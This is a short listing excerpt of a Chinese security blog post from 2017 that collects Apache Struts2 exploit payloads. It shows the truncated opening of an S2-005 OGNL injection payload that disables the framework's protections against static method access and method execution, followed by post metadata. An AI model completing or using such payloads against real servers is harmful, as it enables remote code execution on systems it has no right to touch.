摘要: 以下payload仅作整理记录,可以通过修改代码,改为带回显的自己的payload s2-005: ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMet 阅读全文
posted @ 2017-09-14 13:35 0x03 阅读(745) 评论(0) 推荐(0) 编辑